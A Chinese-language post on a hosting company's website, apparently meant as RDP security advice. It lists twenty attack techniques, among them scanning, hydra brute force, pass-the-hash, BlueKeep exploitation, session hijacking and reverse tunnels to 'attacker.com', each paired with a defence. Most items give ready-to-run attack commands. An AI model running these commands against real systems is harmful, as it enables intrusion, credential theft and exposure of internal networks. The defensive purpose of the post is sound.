關於我們

質量為本、客戶為根、勇於拼搏、務實創新

< 返回新聞公共列表

Windows遠程桌面RDP滲透安全建議

發布時間:2025-06-21 16:16:44

1、全網段RDP端口掃描

masscan -p3389 10.0.0.0/8 --rate 100000 -oG rdp_scan.gnmap

原理:利用高速掃描定位全網開放3389端口的主機,結合Nmap腳本識別Windows版本。

防禦:修改默認RDP端口,防火牆過濾非可信IP訪問。


2、歷史證書關聯資產挖掘

curl "https://crt.sh/?q=%.target.com&output=json" | jq '.[].name_value' | grep "rdp"

原理:通過SSL證書透明度日誌發現隱藏的RDP子域。

防禦:定期清理過期證書,禁用無關子域解析。


3、多線程RDP暴力破解

hydra -V -f -L users.txt -P passwords.txt rdp://192.168.1.100 -t 64

原理:利用弱口令或默認憑證(如Admin/123456)突破認證。

防禦:啟用帳戶鎖定策略(3次失敗鎖定30分鐘),強制複雜密碼。


4、Pass-the-Hash攻擊

xfreerdp /v:target_ip /u:Administrator /pth:NTLM_HASH +sec-nla

原理:通過NTLM哈希繞過密碼驗證,需NLA未強制啟用。

防禦:啟用CredSSP或限制本地管理員帳戶遠程登錄。


5、 BlueKeep漏洞自動化利用

msf> use exploit/windows/rdp/cve_2019_0708_bluekeep

原理:CVE-2019-0708漏洞無需憑證實現遠程代碼執行,影響Windows 7/2008。

防禦:及時安裝KB4499175補丁,禁用老舊系統RDP服務。


6、 RDP會話劫持(Session Hijacking)

tscon %SESSION_ID% /dest:rdp-tcp#0

原理:在已授權會話中注入新進程,接管活躍RDP連接。

防禦:啟用受限管理員模式,監控異常會話ID變更。


7、 WMI遠程命令執行

wmic /node:192.168.1.101 /user:DOMAIN\Admin process call create "cmd.exe /c reg add HKLM\..."

原理:通過WMI介面在遠程主機執行命令,需管理員許可權。

防禦:限制WMI遠程訪問,啟用Windows Defender ATP行為監控。


8、DCOM橫向移動

8.png

原理:利用DCOM組件繞過防火牆限制執行命令。

防禦:禁用非必要DCOM組件,配置DCOM ACL許可權。


9、 Plink建立SSH隧道

plink -ssh -P 2222 -R 3389:localhost:3389 attacker.com -l user -i key.ppk

原理:通過SSH反向隧道暴露內網RDP端口至公網。

防禦:監控異常SSH外聯,限制出站SSH流量。


10、 Cloudflare Tunnel內網穿透

cloudflared tunnel --url rdp://localhost:3389 --hostname rdp.attacker.com

原理:利用Cloudflare Zero Trust隱藏真實IP,繞過防火牆策略。

防禦:審查合法SaaS服務使用情況,阻斷未授權Tunnel進程。


11、 RDP影子會話劫持

mstsc /shadow:%SESSION_ID% /noConsentPrompt /control

原理:利用Windows影子會話功能接管活躍用戶桌面(需SYSTEM許可權)。

防禦:組策略禁用影子會話(電腦配置→管理範本→Windows組件→遠程桌面服務→不允許遠程控制)。


12、 RDP自啟動後門植入

12.png

原理:通過註冊表劫持RDP客戶端加載惡意DLL。

防禦:啟用Windows LSA保護,監控敏感註冊表項變更。


13、繞過受限管理模式

13.png

原理:通過PowerShell Remoting繞過RDP登錄限制。

防禦:禁用WinRM服務,限制PowerShell遠程執行許可權。


14、NLA協議降級攻擊

xfreerdp /v:target_ip /u:user /p:password -sec-rdp

原理:強制使用弱加密的RDP協議(禁用NLA)。

防禦:組策略強制啟用僅允許使用網路級別身份驗證的遠程連接。


15、記憶體提取RDP憑據

15.png

原理:利用Mimikatz提取lsass進程中緩存的RDP登錄憑據。

防禦:啟用Credential Guard,限制本地管理員許可權。


16、 RDP代理劫持攻擊

15.png

原理:搭建中間人代理記錄鍵盤操作和螢幕截圖。

防禦:啟用RDP SSL加密(.rdp檔中enablecredsspsupport:i:1)。


17、動態端口RDP服務

17.png

原理:修改註冊表動態變更RDP端口躲避掃描。

防禦:監控註冊表敏感項修改,限制端口變更許可權。


18、ICMP隱蔽隧道

18.png

原理:通過ICMP協議封裝RDP流量繞過流量審計。

防禦:部署IDS規則檢測異常ICMP載荷長度(alert icmp any any -> any any (dsize:>100; msg:"ICMP Tunnel";))。


19、RDP蜜罐識別繞過

19.png

原理:通過IP反查與回應特徵識別雲蜜罐系統。

防禦:部署高交互蜜罐(如Honeydrive),模擬真實業務流量。


20、全自動化RDP武器化

20.png

原理:利用Python庫實現RDP協議級自動化攻擊。

防禦:啟用Windows Attack Surface Reduction規則,限制未知進程執行。


RDP作為企業核心入口,攻防對抗已進入深水區。防禦建議:

.1. 網路層:啟用RDP Gateway,限制源IP白名單

.2. 系統層:強制NLA認證,定期更新補丁

.3. 監控層:部署UEBA分析異常登錄時間/地理位置

.4. 人員層:啟用雙因素認證


感謝您的閱讀、希望此篇技術建議能夠幫助到您。

官方地址:https://www.hkhonest.com/

HONGKONG HONEST NETWORK LIMITED


/../template/Home/Honest/PC/Static
HONGKONG HONEST NETWORK LIMITED
HongKong honest Information Network Co., Ltd
點擊按鈕可通過QQ進行溝通,請確認啟動QQ
Click the button to communicate through QQ, please confirm to start QQ